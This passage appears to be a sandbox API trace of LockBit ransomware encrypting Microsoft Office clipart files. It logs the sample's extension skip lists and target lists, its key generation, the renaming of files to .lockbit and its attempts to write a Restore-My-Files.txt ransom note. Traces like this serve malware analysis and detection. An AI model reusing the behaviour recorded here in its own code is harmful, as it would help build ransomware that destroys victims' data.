Office\\CLIPART\\PUB60COR\\J0164153.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0164153.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0147.040] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.040] malloc (_Size=0x40068) returned 0x3d70450 [0147.040] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=46484) returned 1 [0147.040] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.041] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.041] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0147.041] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.041] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.041] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0147.041] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0147.046] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0164153.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0164153.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.046] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.046] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.047] free (_Block=0x1fa2ed8) [0147.048] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0164153.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.048] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.048] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.049] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f99890, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x51aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0168644.WMF", cAlternateFileName="")) returned 1 [0147.049] lstrcmpiW (lpString1=".", lpString2="J0168644.WMF") returned -1 [0147.049] lstrcmpiW (lpString1="..", lpString2="J0168644.WMF") returned -1 [0147.049] PathFindExtensionW (pszPath="J0168644.WMF") returned=".WMF" [0147.049] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0147.049] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0147.049] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0147.049] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0147.049] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0147.049] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0147.049] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0147.049] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0147.049] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0147.050] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0147.050] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0147.050] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0147.050] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0147.050] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0147.050] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0147.050] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0147.050] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0147.050] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0147.050] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0147.050] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0147.050] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0147.050] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0147.050] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0147.050] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0147.050] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.050] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0147.050] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0147.050] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0147.050] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0147.051] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0147.051] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0147.051] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0147.051] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0147.051] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0147.051] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0147.051] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0147.051] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0147.051] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0147.051] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0147.051] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0147.051] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0147.051] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0147.051] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.051] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0147.051] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0147.051] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0147.051] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0147.051] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0168644.WMF") returned 1 [0147.052] lstrcmpiW (lpString1="ntldr", lpString2="J0168644.WMF") returned 1 [0147.052] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0168644.WMF") returned 1 [0147.103] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0168644.WMF") returned -1 [0147.103] lstrcmpiW (lpString1="autorun.inf", lpString2="J0168644.WMF") returned -1 [0147.112] lstrcmpiW (lpString1="thumbs.db", lpString2="J0168644.WMF") returned 1 [0147.112] lstrcmpiW (lpString1="iconcache.db", lpString2="J0168644.WMF") returned -1 [0147.112] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.112] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0168644.WMF") returned=".WMF" [0147.112] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0147.112] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0147.113] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0147.113] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0147.113] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0147.113] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0147.113] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0147.113] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0147.113] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0147.113] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0147.113] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0147.115] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0147.115] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0147.115] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0147.115] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0147.115] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0147.115] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0147.115] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0147.115] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0147.116] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0147.116] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0147.116] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0147.116] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0147.116] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0147.116] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0147.116] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0147.116] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0147.116] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0147.116] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0168644.WMF.lockbit") returned 72 [0147.116] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0168644.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0168644.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0147.120] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.120] malloc (_Size=0x40068) returned 0x3df0008 [0147.120] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=20906) returned 1 [0147.121] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.123] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.125] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0147.132] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.132] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.132] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0147.132] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0147.134] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0168644.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0168644.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.134] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.134] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.136] free (_Block=0x1fa2ed8) [0147.136] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0168644.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.136] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.136] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.136] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5649e8f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3888, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0171685.WMF", cAlternateFileName="")) returned 1 [0147.136] lstrcmpiW (lpString1=".", lpString2="J0171685.WMF") returned -1 [0147.136] lstrcmpiW (lpString1="..", lpString2="J0171685.WMF") returned -1 [0147.136] PathFindExtensionW (pszPath="J0171685.WMF") returned=".WMF" [0147.136] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0147.136] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0147.136] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0147.136] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0147.136] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0147.136] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0147.137] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0147.137] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0147.137] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0147.137] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0147.137] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0147.137] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0147.137] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0147.137] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0147.137] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0147.137] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0147.137] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0147.137] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0147.137] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0147.137] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0147.137] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0147.137] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0147.137] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0147.137] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0147.137] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.137] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0147.137] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0147.137] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0147.137] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0147.137] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0147.138] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0147.138] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0147.138] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0147.138] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0147.138] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0147.138] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0147.138] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0147.138] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0147.138] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0147.138] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0147.138] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0147.138] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0147.138] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.138] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0147.138] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0147.138] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0147.138] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0147.138] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0171685.WMF") returned 1 [0147.138] lstrcmpiW (lpString1="ntldr", lpString2="J0171685.WMF") returned 1 [0147.138] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0171685.WMF") returned 1 [0147.138] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0171685.WMF") returned -1 [0147.138] lstrcmpiW (lpString1="autorun.inf", lpString2="J0171685.WMF") returned -1 [0147.138] lstrcmpiW (lpString1="thumbs.db", lpString2="J0171685.WMF") returned 1 [0147.138] lstrcmpiW (lpString1="iconcache.db", lpString2="J0171685.WMF") returned -1 [0147.139] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.139] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171685.WMF") returned=".WMF" [0147.139] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0147.139] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0147.139] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0147.139] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0147.139] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0147.139] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0147.139] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0147.139] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0147.139] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0147.139] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0147.139] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0147.139] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0147.139] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0147.139] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0147.139] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0147.139] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0147.139] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0147.139] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0147.139] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0147.139] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0147.139] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0147.140] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0147.140] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0147.140] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0147.140] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0147.140] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0147.140] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0147.140] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0147.140] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171685.WMF.lockbit") returned 72 [0147.140] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171685.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0171685.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0147.141] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.141] malloc (_Size=0x40068) returned 0x1ff1e60 [0147.141] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=14472) returned 1 [0147.141] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.142] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.142] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0147.142] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.142] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.142] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0147.142] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0147.147] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171685.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171685.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.147] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.147] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.148] free (_Block=0x1fa2ed8) [0147.148] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171685.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.148] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.148] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.148] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f99890, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1ae8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0171847.WMF", cAlternateFileName="")) returned 1 [0147.148] lstrcmpiW (lpString1=".", lpString2="J0171847.WMF") returned -1 [0147.148] lstrcmpiW (lpString1="..", lpString2="J0171847.WMF") returned -1 [0147.148] PathFindExtensionW (pszPath="J0171847.WMF") returned=".WMF" [0147.148] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0147.148] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0147.148] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0147.149] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0147.149] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0147.149] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0147.149] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0147.149] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0147.149] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0147.149] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0147.149] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0147.149] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0147.149] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0147.149] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0147.149] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0147.149] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0147.149] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0147.149] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0147.149] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0147.149] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0147.149] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0147.149] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0147.149] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0147.149] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0147.149] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.150] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0147.150] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0147.150] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0147.150] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0147.150] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0147.150] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0147.150] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0147.150] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0147.150] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0147.150] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0147.150] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0147.150] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0147.150] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned 